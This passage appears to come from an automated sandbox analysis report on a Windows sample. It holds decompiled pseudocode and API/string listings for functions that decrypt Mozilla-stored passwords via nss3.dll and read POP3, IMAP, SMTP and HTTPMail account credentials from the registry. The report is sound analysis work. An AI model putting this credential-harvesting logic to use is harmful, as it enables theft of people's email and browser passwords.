                                                                                  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                • API String ID: 1296682400-4029219660
                                                                                • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                                • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402606, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 35%
                                                                                			E00402606(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t67;
				void* _t70;
				void* _t73;
				void* _t87;
				signed int _t90;
				void* _t92;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t114;

				_t114 = __fp0;
				_t92 = __ecx;
				_t103 = _t105 - 0x6c;
				_t106 = _t105 - 0x474;
				 *(_t103 + 0x4c) = "POP3 User Name";
				 *(_t103 + 0x50) = "IMAP User Name";
				 *(_t103 + 0x54) = "HTTPMail User Name";
				 *(_t103 + 0x58) = "SMTP USer Name";
				 *(_t103 + 0x1c) = "POP3 Server";
				 *(_t103 + 0x20) = "IMAP Server";
				 *(_t103 + 0x24) = "HTTPMail Server";
				 *(_t103 + 0x28) = "SMTP Server";
				 *(_t103 + 0x3c) = "POP3 Password2";
				 *(_t103 + 0x40) = "IMAP Password2";
				 *(_t103 + 0x44) = "HTTPMail Password2";
				 *(_t103 + 0x48) = "SMTP Password2";
				 *(_t103 + 0x2c) = "POP3 Port";
				 *(_t103 + 0x30) = "IMAP Port";
				 *(_t103 + 0x34) = "HTTPMail Port";
				 *(_t103 + 0x38) = "SMTP Port";
				 *(_t103 + 0x5c) = "POP3 Secure Connection";
				 *(_t103 + 0x60) = "IMAP Secure Connection";
				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
				 *(_t103 + 0x68) = "SMTP Secure Connection";
				_t90 = 0;
				do {
					 *(_t103 - 0x64) = 0;
					memset(_t103 - 0x63, 0, 0x7f);
					_push(_t103 - 0x64);
					_t96 = _t90 << 2;
					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
					_push( *((intOrPtr*)(_t103 + 0x78)));
					_t58 = 0x7f;
					_t59 = E0040EB80(_t58, _t92);
					_t106 = _t106 + 0x18;
					if(_t59 == 0) {
						E004021D8(_t103 - 0x408);
						strcpy(_t103 - 0x1f4, _t103 - 0x64);
						_t100 =  *((intOrPtr*)(_t103 + 0x78));
						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
						_t34 = _t90 + 1; // 0x1
						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
						_push(_t103 - 0x2f8);
						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
						_push(_t100);
						_t67 = 0x7f;
						E0040EB80(_t67, _t92);
						_push(_t103 - 0x3fc);
						_push("SMTP Display Name");
						_push(_t100);
						_t70 = 0x7f;
						E0040EB80(_t70, _t92);
						_push(_t103 - 0x378);
						_push("SMTP Email Address");
						_push(_t100);
						_t73 = 0x7f;
						E0040EB80(_t73, _t92);
						_t108 = _t106 + 0x2c;
						if(_t90 != 3) {
							_push(_t103 - 0x278);
							_push("SMTP Server");
							_push(_t100);
							_t87 = 0x7f;
							E0040EB80(_t87, _t92);
							_t108 = _t108 + 0xc;
						}
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
						_t106 = _t108 + 0x18;
						_t101 =  *((intOrPtr*)(_t103 + 0x74));
						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
						_pop(_t92);
						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
					}
					_t90 = _t90 + 1;
				} while (_t90 < 4);
				return _t59;
			}




















                                                                                0x00402606
                                                                                0x00402606
                                                                                0x00402607
                                                                                0x0040260b
                                                                                0x00402614
                                                                                0x0040261b
                                                                                0x00402622
                                                                                0x00402629
                                                                                0x00402630
                                                                                0x00402637
                                                                                0x0040263e
                                                                                0x00402645
                                                                                0x0040264c
                                                                                0x00402653
                                                                                0x0040265a
                                                                                0x00402661
                                                                                0x00402668
                                                                                0x0040266f
                                                                                0x00402676
                                                                                0x0040267d
                                                                                0x00402684
                                                                                0x0040268b
                                                                                0x00402692
                                                                                0x00402699
                                                                                0x004026a0
                                                                                0x004026a2
                                                                                0x004026aa
                                                                                0x004026ae
                                                                                0x004026b6
                                                                                0x004026b9
                                                                                0x004026bc
                                                                                0x004026c0
                                                                                0x004026c5
                                                                                0x004026c6
                                                                                0x004026cb
                                                                                0x004026d0
                                                                                0x004026dc
                                                                                0x004026ec
                                                                                0x004026f4
                                                                                0x004026f7
                                                                                0x004026fd
                                                                                0x00402700
                                                                                0x0040270c
                                                                                0x0040270d
                                                                                0x00402711
                                                                                0x00402714
                                                                                0x00402715
                                                                                0x00402720
                                                                                0x00402721
                                                                                0x00402726
                                                                                0x00402729
                                                                                0x0040272a
                                                                                0x00402735
                                                                                0x00402736
                                                                                0x0040273b
                                                                                0x0040273e
                                                                                0x0040273f
                                                                                0x00402744
                                                                                0x0040274a
                                                                                0x00402752
                                                                                0x00402753
                                                                                0x00402758
                                                                                0x0040275b
                                                                                0x0040275c
                                                                                0x00402761
                                                                                0x00402761
                                                                                0x0040276d
                                                                                0x0040277b
                                                                                0x00402780
                                                                                0x00402791
                                                                                0x00402796
                                                                                0x004027a9
                                                                                0x004027af
                                                                                0x004027b7
                                                                                0x004027b7
                                                                                0x004027bc
                                                                                0x004027bd
                                                                                0x004027cd

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004026AE
                                                                                  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                • strcpy.MSVCRT(?,?,?,?,?,73AFED80,?,00000000), ref: 004026EC
                                                                                • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$QueryValuememset
                                                                                • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                • API String ID: 3373037483-1627711381
                                                                                • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                                                • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004027D0, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 118stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E004027D0(void* __fp0) {
				void* __esi;
				void* _t66;
				signed int _t92;
				void* _t95;
				intOrPtr _t109;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t121;

				_t121 = __fp0;
				_t111 = _t113 - 0x70;
				_t114 = _t113 - 0x474;
				 *(_t111 + 0x40) = "POP3 Password";
				 *(_t111 + 0x44) = "IMAP Password";
				 *(_t111 + 0x48) = "HTTP Password";
				 *(_t111 + 0x4c) = "SMTP Password";
				 *(_t111 + 0x50) = "POP3 User";
				 *(_t111 + 0x54) = "IMAP User";
				 *(_t111 + 0x58) = "HTTP User";
				 *(_t111 + 0x5c) = "SMTP User";
				 *(_t111 + 0x20) = "POP3 Server";
				 *(_t111 + 0x24) = "IMAP Server";
				 *(_t111 + 0x28) = "HTTP Server URL";
				 *(_t111 + 0x2c) = "SMTP Server";
				 *(_t111 + 0x30) = "POP3 Port";
				 *(_t111 + 0x34) = "IMAP Port";
				 *(_t111 + 0x38) = "HTTP Port";
				 *(_t111 + 0x3c) = "SMTP Port";
				 *(_t111 + 0x60) = "POP3 Use SPA";
				 *(_t111 + 0x64) = "IMAP Use SPA";
				 *(_t111 + 0x68) = "HTTPMail Use SSL";
				 *(_t111 + 0x6c) = "SMTP Use SSL";
				_t92 = 0;
				do {
					 *(_t111 - 0x60) = 0;
					memset(_t111 - 0x5f, 0, 0x7f);
					_t114 = _t114 + 0xc;
					_t100 = _t92 << 2;
					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
					if(_t66 != 0) {
						E004021D8(_t111 - 0x404);
						strcpy(_t111 - 0x1f0, _t111 - 0x60);
						_pop(_t95);
						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
						_t37 = _t92 + 1; // 0x1
						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
						if(_t92 != 3) {
							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
							_t114 = _t114 + 0xc;
						}
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
						_t109 =  *((intOrPtr*)(_t111 + 0x78));
						_t114 = _t114 + 0x18;
						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
					}
					_t92 = _t92 + 1;
				} while (_t92 < 4);
				return _t66;
			}












                                                                                0x004027d0
                                                                                0x004027d1
                                                                                0x004027d5
                                                                                0x004027de
                                                                                0x004027e5
                                                                                0x004027ec
                                                                                0x004027f3
                                                                                0x004027fa
                                                                                0x00402801
                                                                                0x00402808
                                                                                0x0040280f
                                                                                0x00402816
                                                                                0x0040281d
                                                                                0x00402824
                                                                                0x0040282b
                                                                                0x00402832
                                                                                0x00402839
                                                                                0x00402840
                                                                                0x00402847
                                                                                0x0040284e
                                                                                0x00402855
                                                                                0x0040285c
                                                                                0x00402863
                                                                                0x0040286a
                                                                                0x0040286c
                                                                                0x00402874
                                                                                0x00402878
                                                                                0x0040287d
                                                                                0x00402882
                                                                                0x0040288f
                                                                                0x00402896
                                                                                0x004028a2
                                                                                0x004028b2
                                                                                0x004028c1
                                                                                0x004028c6
                                                                                0x004028cf
                                                                                0x004028d8
                                                                                0x004028de
                                                                                0x004028f1
                                                                                0x00402904
                                                                                0x0040290c
                                                                                0x0040291c
                                                                                0x0040292d
                                                                                0x00402932
                                                                                0x00402932
                                                                                0x00402940
                                                                                0x00402950
                                                                                0x00402955
                                                                                0x00402958
                                                                                0x0040296d
                                                                                0x00402980
                                                                                0x0040298e
                                                                                0x0040298e
                                                                                0x00402993
                                                                                0x00402994
                                                                                0x004029a4

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00402878
                                                                                  • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                                                • strcpy.MSVCRT(?,?,73AFED80,?,00000000), ref: 004028B2
                                                                                • strcpy.MSVCRT(?,?,?,?,?,?,?,?,73AFED80,?,00000000), ref: 00402980
                                                                                  • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                                                • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                • API String ID: 2416467034-4086712241
                                                                                • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                                                • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F435, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 81%
                                                                                			E0040F435(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040F3BA(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E00406172(_t89);
							if(E0040F3BA(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040F3BA(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040EC05(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00411642();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00411648();
							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041164E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L004115C4();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040EC05(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}



























                                                                                0x0040f449
                                                                                0x0040f453
                                                                                0x0040f459
                                                                                0x0040f46b
                                                                                0x0040f471
                                                                                0x0040f484
                                                                                0x0040f486
                                                                                0x0040f48b
                                                                                0x0040f490
                                                                                0x0040f5e6
                                                                                0x0040f5ee
                                                                                0x0040f5f7
                                                                                0x0040f600
                                                                                0x0040f60e
                                                                                0x0040f610
                                                                                0x0040f610
                                                                                0x0040f614
                                                                                0x0040f616
                                                                                0x0040f623
                                                                                0x0040f625
                                                                                0x0040f625
                                                                                0x0040f629
                                                                                0x0040f62d
                                                                                0x0040f63b
                                                                                0x0040f63d
                                                                                0x0040f63d
                                                                                0x0040f63b
                                                                                0x0040f629
                                                                                0x0040f614
                                                                                0x0040f64a
                                                                                0x0040f496
                                                                                0x0040f4a3
                                                                                0x0040f4a9
                                                                                0x0040f4b9
                                                                                0x0040f4bc
                                                                                0x0040f4c1
                                                                                0x0040f5d5
                                                                                0x0040f4c9
                                                                                0x0040f4cb
                                                                                0x0040f4d1
                                                                                0x0040f4d6
                                                                                0x0040f4d7
                                                                                0x0040f4dc
                                                                                0x0040f4e1
                                                                                0x0040f4f0
                                                                                0x0040f4f6
                                                                                0x0040f508
                                                                                0x0040f50e
                                                                                0x0040f519
                                                                                0x0040f51a
                                                                                0x0040f525
                                                                                0x0040f52a
                                                                                0x0040f52b
                                                                                0x0040f547
                                                                                0x0040f54c
                                                                                0x0040f552
                                                                                0x0040f554
                                                                                0x0040f555
                                                                                0x0040f55a
                                                                                0x0040f55f
                                                                                0x0040f561
                                                                                0x0040f561
                                                                                0x0040f569
                                                                                0x0040f581
                                                                                0x0040f582
                                                                                0x0040f589
                                                                                0x0040f591
                                                                                0x0040f592
                                                                                0x0040f5a2
                                                                                0x0040f5b5
                                                                                0x0040f5ba
                                                                                0x0040f5ba
                                                                                0x0040f592
                                                                                0x0040f569
                                                                                0x0040f5bd
                                                                                0x0040f5cd
                                                                                0x0040f5d2
                                                                                0x0040f5d2
                                                                                0x0040f5e0
                                                                                0x00000000
                                                                                0x0040f5e0

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F459
                                                                                • memset.MSVCRT ref: 0040F471
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 0040F4A9
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                                                • memset.MSVCRT ref: 0040F4F6
                                                                                • memset.MSVCRT ref: 0040F50E
                                                                                • _snprintf.MSVCRT ref: 0040F52B
                                                                                • _mbsrchr.MSVCRT ref: 0040F555
                                                                                • _mbsicmp.MSVCRT ref: 0040F589
                                                                                • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                                                • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                                                • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                                                • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                • API String ID: 3269028891-3267283505
                                                                                • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                                                • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F126, Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E0040F126(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}













                                                                                0x0040f126
                                                                                0x0040f141
                                                                                0x0040f147
                                                                                0x0040f155
                                                                                0x0040f15b
                                                                                0x0040f160
                                                                                0x0040f167
                                                                                0x0040f16e
                                                                                0x0040f175
                                                                                0x0040f175
                                                                                0x0040f17b
                                                                                0x0040f17e
                                                                                0x0040f180
                                                                                0x0040f188
                                                                                0x0040f18d
                                                                                0x0040f194
                                                                                0x0040f1a3
                                                                                0x0040f1b0
                                                                                0x0040f1b5
                                                                                0x0040f1b5
                                                                                0x0040f1b8
                                                                                0x0040f1be
                                                                                0x0040f1da
                                                                                0x0040f1e7
                                                                                0x0040f1ec
                                                                                0x0040f1f5
                                                                                0x0040f1fb
                                                                                0x0040f1ff
                                                                                0x0040f207
                                                                                0x0040f20d
                                                                                0x0040f212
                                                                                0x0040f21c
                                                                                0x0040f224
                                                                                0x0040f22a
                                                                                0x0040f22e
                                                                                0x0040f236
                                                                                0x0040f23c
                                                                                0x0040f242

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F147
                                                                                • memset.MSVCRT ref: 0040F15B
                                                                                • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                                • sprintf.MSVCRT ref: 0040F1A3
                                                                                • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                                • sprintf.MSVCRT ref: 0040F1DA
                                                                                • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                                • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                                • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                                • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                                • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                                • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcat$memsetsprintf$strcpy
                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                • API String ID: 1662040868-1996832678
                                                                                • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                                                • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AF17, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AF17(void* __eax, intOrPtr _a4) {
				char _v271;
				char _v532;
				intOrPtr _v536;
				char _v540;
				void _v803;
				char _v804;
				void* __ebx;
				void* __edi;
				char* _t47;
				intOrPtr _t67;
				WINDOWPLACEMENT* _t73;
				void* _t75;
				char* _t83;
				struct HWND__* _t84;
				intOrPtr _t88;
				int _t90;

				_t75 = __eax;
				_v804 = 0;
				memset( &_v803, 0, 0x104);
				GetModuleFileNameA(0,  &_v804, 0x104);
				_t47 = strrchr( &_v804, 0x2e);
				if(_t47 != 0) {
					 *_t47 = 0;
				}
				strcat( &_v804, ".cfg");
				_v536 = _a4;
				_v540 = 0x413bdc;
				_v532 = 0;
				_v271 = 0;
				strcpy( &_v532,  &_v804);
				strcpy( &_v271, "General");
				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
				_t67 = _v536;
				_a4 = _t67;
				_t90 = 0x2c;
				if(_t67 != 0) {
					_t84 =  *(_t75 + 0x108);
					if(_t84 != 0) {
						_t73 = _t75 + 0x128;
						_t73->length = _t90;
						GetWindowPlacement(_t84, _t73);
					}
				}
				_t83 =  &_v540;
				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
				if(_a4 == 0) {
					E00401896(_t75);
				}
				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
			}



















                                                                                0x0040af29
                                                                                0x0040af35
                                                                                0x0040af3c
                                                                                0x0040af4d
                                                                                0x0040af5c
                                                                                0x0040af65
                                                                                0x0040af67
                                                                                0x0040af67
                                                                                0x0040af76
                                                                                0x0040af7e
                                                                                0x0040af92
                                                                                0x0040af9c
                                                                                0x0040afa3
                                                                                0x0040afaa
                                                                                0x0040afbb
                                                                                0x0040afc0
                                                                                0x0040afdf
                                                                                0x0040aff8
                                                                                0x0040b011
                                                                                0x0040b02a
                                                                                0x0040b02d
                                                                                0x0040b037
                                                                                0x0040b03a
                                                                                0x0040b03b
                                                                                0x0040b03d
